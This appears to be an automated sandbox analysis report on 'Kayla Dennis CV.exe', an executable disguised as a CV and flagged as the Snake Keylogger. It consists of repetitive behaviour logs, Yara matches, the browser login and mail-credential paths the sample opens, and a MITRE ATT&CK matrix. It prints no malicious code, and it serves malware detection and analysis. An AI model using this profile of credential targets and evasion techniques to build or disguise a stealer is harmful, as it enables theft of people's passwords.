Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Users\user\Desktop\Kayla Dennis CV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
